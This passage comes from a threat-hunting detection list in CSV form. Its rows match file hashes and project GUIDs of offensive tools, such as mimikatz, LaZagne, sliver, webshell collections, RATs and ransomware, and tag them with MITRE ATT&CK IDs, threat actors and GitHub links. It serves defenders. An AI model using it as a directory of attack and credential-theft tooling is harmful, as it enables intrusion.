TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34592" "*b2c88487cd1743d186abb8823fdcc4046afea83d850521aef26f753c1c790d7b*",".{0,1000}b2c88487cd1743d186abb8823fdcc4046afea83d850521aef26f753c1c790d7b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34593" "*b2c89ea8b521f8982b315e7e077aedb5f0f1a1cfdc6d5439b990a731d66c005c*",".{0,1000}b2c89ea8b521f8982b315e7e077aedb5f0f1a1cfdc6d5439b990a731d66c005c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34594" "*B2D22DC6-1CA5-4CE3-9756-3673336705FB*",".{0,1000}B2D22DC6\-1CA5\-4CE3\-9756\-3673336705FB.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","34596" "*b2d5cf34fa343ceb5f73db00d1b647722e871c4489d917e80db438c7b926d45a*",".{0,1000}b2d5cf34fa343ceb5f73db00d1b647722e871c4489d917e80db438c7b926d45a.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34597" "*b2e2d49036ddaebaab3cbcd26b3d1742fca27ce42926f2fbb10791ce8af6f2a6*",".{0,1000}b2e2d49036ddaebaab3cbcd26b3d1742fca27ce42926f2fbb10791ce8af6f2a6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34599" "*b2f54ca92d09074aaebf19ee7e0c6078075a43c269a4cc045e508d041c2b1e50*",".{0,1000}b2f54ca92d09074aaebf19ee7e0c6078075a43c269a4cc045e508d041c2b1e50.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34602" 
"*b2xtranslator.xls.csproj*",".{0,1000}b2xtranslator\.xls\.csproj.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","34604" "*b305da79a7ce7057b89449f9113577f0e3e0a2a5ecc67299a806b56b65418856*",".{0,1000}b305da79a7ce7057b89449f9113577f0e3e0a2a5ecc67299a806b56b65418856.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#filehash","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","34605" "*b310173eac2770b78f821900614fc900502e4cbe506daa55cd1baae3f22fa4cf*",".{0,1000}b310173eac2770b78f821900614fc900502e4cbe506daa55cd1baae3f22fa4cf.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","34608" "*b31812e5b4c63c5b52c9b23e76a5ea9439465ab366a9291c6074bfae5c328e73*",".{0,1000}b31812e5b4c63c5b52c9b23e76a5ea9439465ab366a9291c6074bfae5c328e73.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - 
T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34610" "*b31fc5e7f730a95d7cfc83476e543e00f94bae8f3635101c4b991f0d664ac0d2*",".{0,1000}b31fc5e7f730a95d7cfc83476e543e00f94bae8f3635101c4b991f0d664ac0d2.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","34612" "*b321b10726f3cf1152c5a613bfd48a215518410179ae8de59eeaff0a141aac38*",".{0,1000}b321b10726f3cf1152c5a613bfd48a215518410179ae8de59eeaff0a141aac38.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34613" "*b322f5fecd5a638b4164130a96835085e46d3f682f05ad402261419bea71f79b*",".{0,1000}b322f5fecd5a638b4164130a96835085e46d3f682f05ad402261419bea71f79b.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34614" "*b3240430623b16bab37181f538e1f2ad9c1dacd9e55f1dad013b9e2269d3cc93*",".{0,1000}b3240430623b16bab37181f538e1f2ad9c1dacd9e55f1dad013b9e2269d3cc93.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","34615" "*b32415b6a08d324394ac97c20a27b5f5bd2425f4f7caef7bf75b733c6fe5f2fb*",".{0,1000}b32415b6a08d324394ac97c20a27b5f5bd2425f4f7caef7bf75b733c6fe5f2fb.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","34616" "*b32521b722e44343d730559adf79326d2f4e3126417d934319ab4088185e0f7b*",".{0,1000}b32521b722e44343d730559adf79326d2f4e3126417d934319ab4088185e0f7b.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#filehash","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","34617" 
"*b32776836ec9757de71ab8306f38ba4b2d3e556c5bf7036221c2153619c4dafc*",".{0,1000}b32776836ec9757de71ab8306f38ba4b2d3e556c5bf7036221c2153619c4dafc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","34618" "*b33858d4365b180692b8dd37ce721ffab80d6953a3a1505a6e56973b63c2520d*",".{0,1000}b33858d4365b180692b8dd37ce721ffab80d6953a3a1505a6e56973b63c2520d.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","34620" "*b350e1226b7d00487b47bec0f48320e85e3fb2546dc359cba3f2d77c75b5c599*",".{0,1000}b350e1226b7d00487b47bec0f48320e85e3fb2546dc359cba3f2d77c75b5c599.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","34621" "*B35266FB-81FD-4671-BF1D-CE6AEF8B8D64*",".{0,1000}B35266FB\-81FD\-4671\-BF1D\-CE6AEF8B8D64.{0,1000}","offensive_tool_keyword","PrivFu","inspect token 
information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","34622" "*b35ef52872291ca02dd05f9caba9ac7f93b81407c253d7746673ca51c53d1c52*",".{0,1000}b35ef52872291ca02dd05f9caba9ac7f93b81407c253d7746673ca51c53d1c52.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","34623" "*B362EC25-70BD-4E6C-9744-173D20FDA392*",".{0,1000}B362EC25\-70BD\-4E6C\-9744\-173D20FDA392.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#GUIDproject","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","34624" "*b3639781bbed6842e8168ad211da8d0d3ba32d47152c2bc2e57f056665232ddd*",".{0,1000}b3639781bbed6842e8168ad211da8d0d3ba32d47152c2bc2e57f056665232ddd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - 
Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34625" "*b373730fd4b62553b6a5af092835918243ea29bef6f559849fc8131c935cb6cf*",".{0,1000}b373730fd4b62553b6a5af092835918243ea29bef6f559849fc8131c935cb6cf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34626" "*B374K*index.php*",".{0,1000}B374K.{0,1000}index\.php.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/b374k/b374k","1","0","N/A","N/A","N/A","10","2462","747","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z","34627" "*b37aa3dcdebe406d652a4cfc3fb54168ea6525787fca00876452823f8b33605e*",".{0,1000}b37aa3dcdebe406d652a4cfc3fb54168ea6525787fca00876452823f8b33605e.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34629" "*b37eeeceb6addc2243bca9c408ee13554726772d*",".{0,1000}b37eeeceb6addc2243bca9c408ee13554726772d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","34630" "*b3804cac36175125199ddd8f6840749ead5c723d9641670d244d0a487fcf555c*",".{0,1000}b3804cac36175125199ddd8f6840749ead5c723d9641670d244d0a487fcf555c.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#filehash","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","34631" "*b389754716da0100ccf85c210ac5759b57ad364cd13ef5feb7dca7c53627075f*",".{0,1000}b389754716da0100ccf85c210ac5759b57ad364cd13ef5feb7dca7c53627075f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34632" "*b38dd36a7b348f6350623b1156c9f8805f323dbb9d1dad4b599b6712b8962e82*",".{0,1000}b38dd36a7b348f6350623b1156c9f8805f323dbb9d1dad4b599b6712b8962e82.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","34634" 
"*b3917dd81417aa8ed07f4a60b34853ea6fae2710a3b5812da455328e38b9e7e6*",".{0,1000}b3917dd81417aa8ed07f4a60b34853ea6fae2710a3b5812da455328e38b9e7e6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34635" "*b394dc8dd4e30635b73da61c974d966752ed7712e6a4116b257baee6f7d1718f*",".{0,1000}b394dc8dd4e30635b73da61c974d966752ed7712e6a4116b257baee6f7d1718f.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","34636" "*b39fc6b0494a3543d3a96e7521f902268b447625aecacff3b241a8ce0b6419f8*",".{0,1000}b39fc6b0494a3543d3a96e7521f902268b447625aecacff3b241a8ce0b6419f8.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34639" "*b3a068eaaaefa3f21836c4628ad89fcf8cb20cdb22bc7a188e0b9be9aa29a9c3*",".{0,1000}b3a068eaaaefa3f21836c4628ad89fcf8cb20cdb22bc7a188e0b9be9aa29a9c3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34640" "*b3a161043abbacb0b787da084f3222a1d3432aaff6f9fd16a244a42747ab6d8f*",".{0,1000}b3a161043abbacb0b787da084f3222a1d3432aaff6f9fd16a244a42747ab6d8f.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","34641" "*b3ae1abc15df71a69f3a629fbe5a168acc7514905d8fd82eb8c62e60f61e846e*",".{0,1000}b3ae1abc15df71a69f3a629fbe5a168acc7514905d8fd82eb8c62e60f61e846e.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","34642" "*b3afbfb23b2dc699e008d6331bb6548ca2eff4af4239eba06e55112338b7611d*",".{0,1000}b3afbfb23b2dc699e008d6331bb6548ca2eff4af4239eba06e55112338b7611d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34643" "*b3b092ecd0cdb03ec5c038d281b5acc2dec8f01ea55b5742f81410f4f54ff9e2*",".{0,1000}b3b092ecd0cdb03ec5c038d281b5acc2dec8f01ea55b5742f81410f4f54ff9e2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34644" "*b3b1853594a5c1c6ec5d8338b4a22daf42b8ccdf2c10b3966a8db3c46377b52a*",".{0,1000}b3b1853594a5c1c6ec5d8338b4a22daf42b8ccdf2c10b3966a8db3c46377b52a.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","34645" "*b3ba329c974ac0a0ba97b9b63c91f562e80324c8c95ca22d7f004391f51aa51d*",".{0,1000}b3ba329c974ac0a0ba97b9b63c91f562e80324c8c95ca22d7f004391f51aa51d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34647" "*b3bd575e9d0dfd646355151333d400d81f9f7250a51937004809ad922d8e049b*",".{0,1000}b3bd575e9d0dfd646355151333d400d81f9f7250a51937004809ad922d8e049b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34648" "*b3c00fe058ad002b26112c1989f4237d986b6cf5c9e3dfd5029d0c9169330f34*",".{0,1000}b3c00fe058ad002b26112c1989f4237d986b6cf5c9e3dfd5029d0c9169330f34.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34649" "*b3c03d75ad1fb5de827f2749a16b03e355d9f63651c29629d979d57074e79c09*",".{0,1000}b3c03d75ad1fb5de827f2749a16b03e355d9f63651c29629d979d57074e79c09.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34650" "*b3c2a6fe40c1c3688b2ea12b7211a3573f1fcfb0fc092e20826db40f8a2fba63*",".{0,1000}b3c2a6fe40c1c3688b2ea12b7211a3573f1fcfb0fc092e20826db40f8a2fba63.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","34652" "*b3c508a09116d5c4b63ea3b64ba54585a92ae84f3f94d73a9528b47357552da8*",".{0,1000}b3c508a09116d5c4b63ea3b64ba54585a92ae84f3f94d73a9528b47357552da8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34653" "*b3c6cc7abf073f7d2faa2ba4212f7b2fd316c50cd07b9001eb40ca73d35c7128*",".{0,1000}b3c6cc7abf073f7d2faa2ba4212f7b2fd316c50cd07b9001eb40ca73d35c7128.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34654" "*b3d052b346f0dce5b8bb7801ebe26fee1bbf156a0072eaeff0bc29ce3a837b9b*",".{0,1000}b3d052b346f0dce5b8bb7801ebe26fee1bbf156a0072eaeff0bc29ce3a837b9b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 
